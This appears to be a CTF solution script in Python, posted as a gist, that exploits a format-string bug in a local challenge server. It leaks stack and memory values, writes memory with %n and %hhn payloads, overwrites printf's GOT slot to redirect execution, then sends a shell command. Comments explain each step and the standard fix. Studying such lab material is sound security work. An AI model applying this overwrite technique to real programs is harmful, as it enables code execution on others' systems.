@isra17
Created October 29, 2014 14:50
import socket
import struct
# Solution script for a CTF format-string challenge served on localhost:31337.
# Each "challenge" stage hands attacker-controlled text to a printf()-style
# call; the stages below use positional format specifiers ('%N$...') first to
# read and finally to write memory.  The server-side fix is the standard one:
# never pass untrusted input as the format argument (printf("%s", buf)),
# build with -Wformat-security, and link with full RELRO so the GOT/PLT slot
# overwritten in the last stage is read-only at run time.
HOST = 'localhost'
PORT = 31337
# One TCP connection is reused for every stage.  The socket is never closed
# explicitly; the interpreter closes it at exit.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# challenge 1: ask printf to render its 71st positional argument as 8 hex
# digits, then send that value back as a little-endian 32-bit integer.
print('challenge1')
print(s.recv(1024))
s.sendall(b'%71$08X\n')
# NOTE(review): 0x1024 (4132) looks like a typo for 1024 here and below; it
# is only an upper bound on the read size, so it is harmless.
key = s.recv(0x1024)
print(s.recv(1024))
print('key:', key)
# int(key, 16) tolerates surrounding whitespace, so the trailing newline in
# the reply does not need stripping.
s.sendall(struct.pack('<I', int(key, 16)))
# challenge 2: '%8$s' prints the C string that the 8th positional argument
# points to.  The four leading bytes (0x0804a2f0, little-endian) are the
# address that argument is presumably resolved to; the ':' marks where the
# dereferenced bytes start in the reply.
print('challenge2')
print(s.recv(0x1024))
payload = b'\xf0\xa2\x04\x08:%8$s\n'
s.sendall(payload)
data = s.recv(0x1024)
# Take the 4 bytes after ':' ...
key = data.split(b':')[1][0:4]
# ... and NUL-pad to 4 bytes: %s stops at the first NUL, so fewer than four
# bytes may come back.  A reply without any ':' raises IndexError above.
key += b'\x00' * (4-len(key))
print(s.recv(0x1024))
print('key:', hex(struct.unpack('<I', key)[0]));
s.sendall(key)
# challenge 3: '%4$n' stores the number of characters printed so far into the
# int that the 4th positional argument points to -- here presumably the
# address sent as the first four bytes (0x0804a2ec).
print('challenge3')
print(s.recv(0x1024))
s.sendall(b'\xec\xa2\x04\x08:%4$n\n')
print(s.recv(0x1024))
print(s.recv(0x1024))
def write_int(addr: int, value: int, offset: int) -> None:
    """Send one format string that stores the 32-bit *value* at *addr*, byte by byte.

    The payload starts with the four addresses addr, addr+1, addr+2, addr+3
    (little-endian), followed by four '%<pad>x:%<k>$hhn' pairs.  Each '%hhn'
    stores the low byte of the running printed-character count into the
    pointer found at positional argument offset+i, so the '%<pad>x' field
    widths are chosen to make that count equal the wanted byte modulo 256.

    Args:
        addr: destination address; the bytes go to addr .. addr+3.
        value: 32-bit value whose bytes are written from low to high.
        offset: positional printf argument at which the first address lands
            (the caller passes 4; presumably fixed by the server's stack layout).

    Side effect: sends the payload over the module-level socket ``s`` and
    prints each pad width.
    """
    outsize = 0
    payload = b'';
    for i in range(4):
        payload += struct.pack('<I', addr+i)
    # outsize tracks the characters printed so far: the 16 address bytes plus
    # every pad, but NOT the ':' separators.  The "-1", "-2", "-3", "-4" terms
    # below account for the colons emitted before each %hhn instead.
    outsize = len(payload)
    # Byte 0: lift the count to the next multiple of 256, then to the wanted
    # byte (minus the one ':' printed before the first %hhn).
    pad = 256 - (outsize % 256)
    pad += (value) % 256-1
    outsize += pad
    print('pad', pad)
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset).encode()
    # Byte 1: two colons have been printed by the time this %hhn fires.
    pad = 256 - (outsize % 256)
    pad += (value >> 8) % 256-2
    outsize += pad
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset+1).encode()
    # Byte 2: three colons.
    pad = 256 - (outsize % 256)
    pad += (value >> 16) % 256-3
    outsize += pad
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset+2).encode()
    # Byte 3: four colons.
    pad = 256 - (outsize % 256)
    pad += (value >> 24) % 256-4
    outsize += pad
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset+3).encode()
    payload += b'\n'
    s.sendall(payload)
#ultimate challenge: the read/write primitives from the stages above are
# combined into a full pointer overwrite.  The hard-coded 0x0804xxxx addresses
# indicate a non-PIE i386 binary; 0x0804a254 is presumably the slot printf is
# called through (the writable GOT entry behind the PLT stub) and 0x08048b60
# the you_wish function.  Full RELRO would make that slot read-only and stop
# this step.
write_int(0x804a254, 0x8048b60, 4) # Rewrite printf's PLT entry with the you_wish function address
print(s.recv(0x1024))
# After the overwrite, the next call through the patched slot presumably runs
# you_wish on the input instead of printf, so the "format string" sent now is
# a shell command line.
s.sendall(b'ls -al\n')
print(s.recv(0x1024))